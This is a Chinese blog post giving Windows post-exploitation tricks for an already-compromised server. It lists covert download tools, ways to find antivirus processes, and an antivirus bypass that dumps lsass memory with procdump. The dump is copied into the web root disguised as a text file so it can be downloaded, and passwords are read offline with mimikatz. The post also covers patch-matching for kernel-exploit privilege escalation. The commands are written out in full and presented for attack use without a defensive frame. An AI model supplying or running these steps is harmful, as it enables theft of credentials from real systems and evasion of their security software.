windows渗透技巧

一,命令行下载方法

	1. powershell下
	 		Invoke-WebRequest

	3. ftp
	4. 写脚本(马),菜刀连接
	5. bitsadmin
	6. certutil


二,搜索指定文件路径和 ☞dir

dir /b /s XXXX

cd /d E: && dir /b /s XXXXX 指定在E盘搜索

/b    使用空格式(没有标题信息或摘要)

/s    显示指定目录和所有子目录中的文件

在这里插入图片描述


三,查看进程的方法 ☞tasklist

tasklist

/svc :无间断地列出每个过程的所有服务信息

在这里插入图片描述

  • 寻找杀软
  • 寻找可利用的第三方

四,绕过杀软,离线读密码

由于杀软的存在,使得一些类似激活guest,添加用户的命令和mimikatz上传不能正常执行。

【解决】

采用procdump导出lsass.dmp,然后从web下载到本地,再使用mimikatz离线读密码绕过

  • procdump是微软官方抓取信息工具
  • lsass.exe 是内存文进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到

【将lsass.dmp导出到哪】

目的是离线读,自然是导出到web目录下, 才能下载到本地喽
		①用dir找到网站目录
					cd /d E: && dir /b /s Logon.aspx|php’
		②copy到该目录
					copy lsass.dmp “E:\Program Files\Web\tmp.txt”

【步骤】

	1. 下载procdump工具
	2. 导出lsass.dmp
			procdump64.exe -accepteula -ma lsass.exe lsass.dmp	
	
	3. 找到web目录,将lsass.dmp 移动到该目录。并下载到本地
	4. 使用mimikatz读取密码
		      mimikatz.exe "sekurlsa::minidump lsass.txt" "sekurlsa::logonPasswords full" exit

相关网站


五,使用windows-kernel-exploits脚本提权

提权枚举脚本使用说明

由SecWiki 大神搞的项目

    1. getshell后 systeminfo查看补丁信息
    2. 本地使用windows-kernel-exploits,进行匹配
	3. 根据匹配的信息在secwiki的项目中找到如何利用的方式。
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值